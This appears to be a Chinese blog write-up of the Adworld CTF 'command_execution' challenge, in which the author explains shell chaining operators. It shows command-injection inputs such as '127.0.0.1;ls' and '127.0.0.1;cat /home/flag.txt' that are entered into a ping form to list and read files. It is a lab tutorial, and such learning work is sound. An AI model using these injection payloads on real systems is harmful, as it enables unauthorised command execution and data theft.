攻防世界command_execution

提示:本人24小时在线,如有疑问,可联系我!


前言

攻防世界command_execution


一、题目?

示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。
进去看看
在这里插入图片描述

二、解决办法

1.先试试ping一下

http://www.baidu.com
在这里插入图片描述

2.命令执行漏洞

掌握有关命令执行的知识

windows 或 linux 下:

command1 && command2 先执行 command1,如果为真,再执行 command2

command1 | command2 只执行 command2

command1 & command2 先执行 command2 后执行 command1

command1 || command2 先执行 command1,如果为假,再执行 command2

命令执行漏洞(| || & && 称为 管道符)

输入127.0.0.1,没有有用的信息

这里我们选择& 、;、 &&作为注入的方式应该都可以。

测试

先ls一下
127.0.0.1;ls
#或者
127.0.0.1&&ls
#或者
127.0.0.1&ls

在这里插入图片描述
![在这里插入图片描述](https://img-blog.csdnimg.cn/8ba6dea1f9524e3199fa2c037a5debdd.png在这里插入图片描述

选择方式查找flag文件

一种方法是通过逐层查看文件目录找到,另一种方式是通过查找函数
函数有全局查找函数 find

127.0.0.1;find / -name "flag*"

找到文件路径,然后cat一下就好了

127.0.0.1;cat /home/flag.txt

在这里插入图片描述
在这里插入图片描述

总结

提示:涉及的知识点是命令执行漏洞。
记住两个命令
全局查找函数 find

127.0.0.1;find / -name "flag*"

找到文件路径,然后cat一下就好了

127.0.0.1;cat /home/flag.txt

结束。

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值